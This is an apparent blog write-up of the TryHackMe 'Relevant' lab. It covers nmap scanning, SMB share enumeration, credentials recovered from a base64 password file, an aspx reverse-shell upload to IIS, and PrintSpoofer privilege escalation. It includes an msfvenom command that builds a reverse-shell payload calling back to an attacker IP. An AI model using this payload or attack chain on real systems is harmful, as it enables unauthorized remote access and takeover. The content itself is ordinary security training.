I"O#<blockquote>
  <p><strong>Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.</strong></p>
</blockquote>

<h1 id="summary"><strong><span style="color:#ff5555">Summary</span></strong></h1>
<hr />

<ul>
  <li>SMB share has access to write</li>
  <li>Validate users</li>
  <li>Transfer payload to the SMB share</li>
  <li>Found SEimpersonate token is enabled</li>
  <li>Exploit it with PrintSpooferrr</li>
</ul>

<h2 id="port-scan"><strong><span style="color:#ff5555">Port Scan</span></strong></h2>
<hr />

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@rhovelionz:~/THM/Relevant#</span><span class="w"> </span>nmap <span class="nt">-A</span> <span class="nt">-T4</span> 10.10.213.110
<span class="go">Starting Nmap 7.80 ( https://nmap.org ) at 2022-09-25 11:01 WIB
</span><span class="gp">Stats: 0:01:09 elapsed;</span><span class="w"> </span>0 hosts completed <span class="o">(</span>1 up<span class="o">)</span>, 1 undergoing Service Scan
<span class="gp">Service scan Timing: About 66.67% done;</span><span class="w"> </span>ETC: 12:41 <span class="o">(</span>0:00:30 remaining<span class="o">)</span>
<span class="go">Nmap scan report for 10.10.213.110
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE        VERSION
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
3389/tcp open  ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-09-25T07:11:01+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
</span><span class="gp">Service Info: OS: Windows;</span><span class="w"> </span>CPE: cpe:/o:microsoft:windows
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre></td> --><td class="rouge-code"><pre><span class="go">PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-09-25T07:19:15+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2020-07-24T23:16:08
|_Not valid after:  2021-01-23T23:16:08
</span><span class="gp">|_ssl-date: 2020-09-19T07:19:56+00:00;</span><span class="w"> </span>0s from scanner time.
<span class="go">49663/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="website"><strong><span style="color:#ff5555">Website</span></strong></h2>
<hr />

<p>The relevant website only shows default IIS windows server’s page.</p>

<p><img src="/images/thm/Relevant/website.png" alt="" /></p>

<h2 id="fuzzing"><strong><span style="color:#ff5555">Fuzzing</span></strong></h2>
<hr />

<p>Running <code class="language-plaintext highlighter-rouge">gobuster</code> on the website with unfortunate output.</p>

<p><img src="/images/thm/Relevant/gobuster1.png" alt="" /></p>

<p>Since it’s windows machine, we need to enumerate SMB based on nmap’s result.</p>

<h2 id="enumerating-smb"><strong><span style="color:#ff5555">Enumerating SMB</span></strong></h2>
<hr />

<p>Using SMBClient to open SMB shares on the server.</p>

<p><img src="/images/thm/Relevant/smb1.png" alt="" /></p>

<p>It shows the <strong>nt4wrksv</strong> share enabled, the next step is to connect with <strong>nt4wrksv</strong> and find out what we can get from it.</p>

<p><img src="/images/thm/Relevant/smb2.png" alt="" /></p>

<p>Download the password.txt file stored in it.</p>

<p>The file consists of two base64 encoded credentials</p>

<p><img src="/images/thm/Relevant/encoded1.png" alt="" /></p>

<p>After decoding the base64, it reveals credentials for Bob and Bill</p>

<p><img src="/images/thm/Relevant/cred1.png" alt="" /></p>

<p>Having these credentials, we can attempt to use it to the target, using <strong>psexec</strong> to check which users is valid.</p>

<p><img src="/images/thm/Relevant/bob.png" alt="" /></p>

<p><img src="/images/thm/Relevant/bill.png" alt="" /></p>

<h2 id="special-port"><strong><span style="color:#ff5555">Special Port</span></strong></h2>
<hr />

<p>Based on nmap’s scan, we also have open port on 49663 which running <strong>Microsoft HTTPAPI httpd</strong></p>

<p>Running <code class="language-plaintext highlighter-rouge">gobuster</code> against port 49663 to check subdirectories in it.</p>

<p><img src="/images/thm/Relevant/gobuster2.png" alt="" /></p>

<p>To validate that we are on the right path, try add passwords.txt that we found on SMB before.</p>

<p><img src="/images/thm/Relevant/passwordstxt.png" alt="" /></p>

<p>It shows the same file that we found in SMB share, that means anything we put on SMB shares because we have write access, and knowing that IIS usually accept an aspx file, we need to craft it and we can download it on the webserver and gain access.</p>

<p>Craft the payload:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="go">msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.62.230 LPORT=1337 -f aspx -o rhovelionz.aspx
</span></pre></td></tr></tbody></table></code></pre></div></div>
<p>Upload it to the smb share</p>

<p><img src="/images/thm/Relevant/uploadtosmbshare.png" alt="" /></p>

<p>We need to start netcat listener and open the link on the browser, and we are in.</p>

<p><img src="/images/thm/Relevant/netcat2.png" alt="" /></p>

<h2 id="escalate-to-administrator"><strong><span style="color:#ff5555">Escalate to Administrator</span></strong></h2>
<hr />

<p>There is an exploit to abuse SeImpersonatePrivilege token that is enabled, that means token impersonation could be used to escalate to the <strong>administrator</strong>.</p>

<p><img src="/images/thm/Relevant/seimpersonate.png" alt="" /></p>

<p>We will be using <code class="language-plaintext highlighter-rouge">PrintSpoofer</code>, download it and tranfer the exploit file via SMB share.</p>

<p><img src="/images/thm/Relevant/uploadprintspoofer.png" alt="" /></p>

<p>Executing the exploit with command with -i to interact with new process and -c cmd to run CMD after execution.</p>

<p><img src="/images/thm/Relevant/execexploit.png" alt="" /></p>

<hr />

<p><img src="/images/mandatory/pwned.png" alt="" /></p>

<blockquote>
  <p><a href="https://tryhackme.com/room/relevant">Tartarus - Tryhackme</a></p>
</blockquote>

:ET